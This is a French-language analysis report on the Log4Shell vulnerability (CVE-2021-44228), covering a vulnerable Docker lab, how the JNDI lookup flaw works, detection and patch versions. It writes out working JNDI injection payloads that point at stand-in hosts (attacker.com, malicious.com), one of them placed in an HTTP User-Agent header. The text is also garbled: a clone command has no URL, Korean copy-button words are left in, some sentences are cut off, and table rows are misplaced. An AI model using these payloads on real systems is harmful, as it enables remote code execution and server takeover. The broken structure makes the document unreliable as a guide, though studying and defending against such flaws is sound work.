
CVE-2021-44228
Rapport d'analyse Log4shell par Won Chi-hyeon de Igloo Corporation
CVE-2021-44228 Log4j est une bibliothèque open source gratuite de la fondation Apache, basée sur Java, utilisée pour enregistrer les logs de divers services Java. Elle inclut une fonctionnalité utilisant JNDI (Java Naming and Directory Interface) pour rechercher des ressources via LDAP sur le port 1389, permettant de référencer des données et des objets trouvés via JNDI Lookup.
Téléchargement de l'image Docker du serveur vulnérable
sudo git clone
sudo docker build . -t vulnerable-app
Construit l'image Docker dans le répertoire actuel en la nommant vulnerable-app.
github.com/welk
Arrêter le serveur vulnérable inutilisé
docker ps -a # Vérifier toutes les images Docker en cours d'exécution
docker container # Vérifier l'ID du conteneur
Log4Shell (CVE-2021-44228) est une vulnérabilité d'exécution de code à distance (RCE) découverte dans la bibliothèque Apache Log4j.
Un attaquant peut exécuter du code arbitraire à l'aide de charges utiles malveillantes, pouvant causer des dégâts considérables.
Ce rapport analyse le principe, l'impact, les cas d'exploitation, la détection et les méthodes de réponse à Log4Shell.
Log4Shell exploite une vulnérabilité de la fonction de recherche JNDI (Java Naming and Directory Interface) permettant à un attaquant d'exécuter du code malveillant depuis un serveur distant.
L'attaquant peut exploiter la vulnérabilité simplement en faisant enregistrer la chaîne suivante dans les logs :
${jndi:ldap://attacker.com:1389/exploit}
La vulnérabilité Log4Shell a affecté de nombreuses entreprises et services utilisant Log4j.
L'attaquant pouvait prendre le contrôle du serveur en saisissant la chaîne suivante dans le chat Minecraft :
복사
편집
${jndi:ldap://attacker.com:1389/exploit}
Le serveur enregistre cette chaîne dans les logs, déclenchant une recherche JNDI qui exécute le code malveillant depuis le serveur de l'attaquant.
Insertion de la charge utile malveillante dans des champs enregistrés dans les logs, comme User-Agent, Referer, X-Forwarded-For d'une requête HTTP. Exemple :
복사
편집
GET / HTTP/1.1
Host: victim.com
User-Agent: ${jndi:ldap://malicious.com:1389/exploit}
✅ Utilisation de scanners de sécurité
✅ Vérification des fichiers de logs
${jndi:ldap://...} sont trouvés dans les logs, une réponse immédiate est nécessaire.✅ Surveillance réseau
✅ Actions immédiates
-Dlog4j2.formatMsgNoLookups=true
jndi:ldap:// dans les pare-feu et IDS/IPS.✅ Mesures de sécurité à long terme
| Version de Log4j | Mesure à prendre |
|---|---|
| 2.0-beta9 ~ 2.14.1 | Vulnérable, mise à jour nécessaire |
| 2.15.0 | Désactivation par défaut de la recherche JNDI |
Log4Shell (CVE-2021-44228) est considérée comme l'une des vulnérabilités de sécurité les plus graves de ces dernières années. ✅ Il est essentiel de corriger rapidement les systèmes vulnérables et d'effectuer une surveillance de sécurité continue. ✅ Toutes les applications utilisant Log4j doivent faire l'objet d'un audit de sécurité.
| Champ | Description |
|---|
| Nom de la vulnérabilité | Log4Shell |
| Numéro CVE | CVE-2021-44228 |
| Type de vulnérabilité | Exécution de code à distance (RCE) |
| Versions affectées | Log4j 2.0-beta9 ~ 2.14.1 |
| Version corrigée | Log4j 2.15.0 et versions ultérieures |
| Difficulté d'attaque | Faible (exploitable par une simple chaîne de caractères) |
| Gravité | 🔥 Critique (CVSS 10.0) |
| 2.16.0 | Suppression complète de la fonctionnalité JNDI |
| 2.17.0 | Mesures de sécurité supplémentaires |
| ✅ Mise à jour vers la dernière version (2.17.1 ou ultérieure) recommandée ! |